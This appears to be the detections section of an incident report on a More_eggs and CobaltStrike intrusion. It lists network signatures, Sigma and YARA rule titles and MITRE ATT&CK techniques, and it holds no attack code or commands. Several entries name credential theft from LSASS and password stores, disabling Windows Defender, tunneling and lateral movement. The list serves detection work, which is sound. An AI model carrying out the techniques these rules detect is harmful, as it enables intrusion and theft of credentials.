cbe1f43ad7a19c97a521a662dd406a3fb345ae919271cefc694a71e55fe163f5
Detections
Network
ETPRO MALWARE Possible More_eggs Connectivity Check M2 ET INFO DNS Query to Cloudflare Tunneling Domain (argotunnel .com) ET INFO Observed Cloudflare Tunneling Domain (argotunnel .com in TLS SNI) ET INFO SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement ET RPC DCERPC SVCCTL - Remote Service Control Manager Access ETPRO MALWARE App Whitelist Bypass Via Com Scriptlet Inbound
Sigma
DFIR Public Rules Repo:
50046619-1037-49d7-91aa-54fc92923604 : AdFind Discovery
DFIR Private Rules:
28702b61-c530-49f8-9d22-de15166ab9c5 : Detection of Modified VeeamHax Tool Usage 9b3a37ab-c97a-451b-94e8-09dae5e759e7 : Detecting the use of a workstation named 'kali' in the network 275ec3d1-47c1-4fa9-a001-fa4feeb5e4d4 : Detect Disabling Windows Defender Threat Protection 855a4c48-fdd5-4283-ba4b-c5ec167e4128 : Detection of Suspicious msxsl.exe Command Line Activity 8c2dc958-3385-4ac7-acdb-eeecafa7944e : Detection of Suspicious IPv6 Address in RDP Sessions 3b4e4f8d-50e3-48c8-a92b-fba48d5af7a1 : Execution IE4uinit.exe to Sideload Malicious Binaries
Sigma Repo:
a7c3d773-caef-227e-a7e7-c2f13c622329 : Bad Opsec Defaults Sacrificial Processes With Improper Arguments 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4 : Cloudflared Tunnel Execution a1d9eec5-33b2-4177-8d24-27fe754d0812 : Cloudflared Tunnels Related DNS Requests d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 : CobaltStrike Named Pipe 5a105d34-05fc-401e-8553-272b45c1522d : CobaltStrike Service Installations - System bf361876-6620-407a-812f-bfe11e51e924 : Compressed File Extraction Via Tar.EXE 0eb46774-f1ab-4a74-8238-1155855f2263 : Disable Windows Defender Functionalities Via Registry Keys 36e037c4-c228-4866-b6a3-48eb292b9955 : DNS Query Request By Regsvr32.EXE 9c14c9fa-1a63-4a64-8e57-d19280559490 : Invoke-Obfuscation Via Stdin 9e50a8b3-dd05-4eb8-9153-bdb6b79d50b0 : Msxsl.EXE Execution c7e91a02-d771-4a6d-a700-42587e0b1095 : Network Connection Initiated By Regsvr32.EXE cd219ff3-fa99-45d4-8380-a7d15116c6dc : New User Created Via Net.EXE 5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE 6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca : Potentially Suspicious Child Process Of Regsvr32 6385697e-9f1b-40bd-8817-f4a91f40508e : PowerShell Base64 Encoded Invoke Keyword 9a132afa-654e-11eb-ae93-0242ac130002 : PUA - AdFind Suspicious Execution 02d1d718-dd13-41af-989d-ea85c7fab93f : Rare Remote Thread Creation By Uncommon Source Image 9525dc73-0327-438c-8c04-13c0e037e9da : Regsvr32 Execution From Potential Suspicious Location c3a99af4-35a9-4668-879e-c09aeb4f2bdf : Rundll32 Execution With Uncommon DLL Extension 1775e15e-b61b-4d14-a1a3-80981298085a : Rundll32 Execution Without CommandLine Parameters 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 : Suspicious CMD Shell Output Redirect fff9d2b7-e11c-4a69-93d3-40ef66189767 : Suspicious Copy From or To System Directory e0b06658-7d1d-4cd3-bf15-03467507ff7c : Suspicious DotNET CLR Usage Log Artifact fb843269-508c-4b76-8b8d-88679db22ce7 : Suspicious Execution of Powershell with Base64 d95de845-b83c-4a9a-8a6a-4fc802ebf6c0 : Suspicious Group And Account Reconnaissance Activity Using Net.EXE dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c : Suspicious Scheduled Task Creation via Masqueraded XML File b5de0c9a-6f19-43e0-af4e-55ad01f550af : Unsigned DLL Loaded by Windows Utility 8de1cbe8-d6f5-496d-8237-5f44a721c7a0 : Whoami.EXE Execution Anomaly c30fb093-1109-4dc8-88a8-b30d11c95a5d : Whoami.EXE Execution With Output Option b28e58e4-2a72-4fae-bdee-0fbe904db642 : Windows Defender Real-time Protection Disabled 3a6586ad-127a-4d3b-a677-1e6eacdf8fde : Windows Shell/Scripting Processes Spawning Suspicious Programs
Yara
https://github.com/The-DFIR-Report/Yara-Rules/blob/main/27899/27899.yar
External Rules:
MITRE ATT&CK
Browser Information Discovery - T1217 Create Account - T1136 Credentials from Password Stores - T1555 Disable or Modify Tools - T1562.001 Domain Account - T1087.002 Domain Groups - T1069.002 Domain Trust Discovery - T1482 Exploitation for Privilege Escalation - T1068 File and Directory Discovery - T1083 File Deletion - T1070.004 Ingress Tool Transfer - T1105 Local Account - T1087.001 Local Groups - T1069.001 LSASS Memory - T1003.001 Malicious File - T1204.002 Network Service Discovery - T1046 Network Share Discovery - T1135 Phishing - T1566 PowerShell - T1059.001 Protocol Tunneling - T1572 Proxy - T1090 Python - T1059.006 Remote Desktop Protocol - T1021.001 Remote System Discovery - T1018 Scheduled Task - T1053.005 Security Software Discovery - T1518.001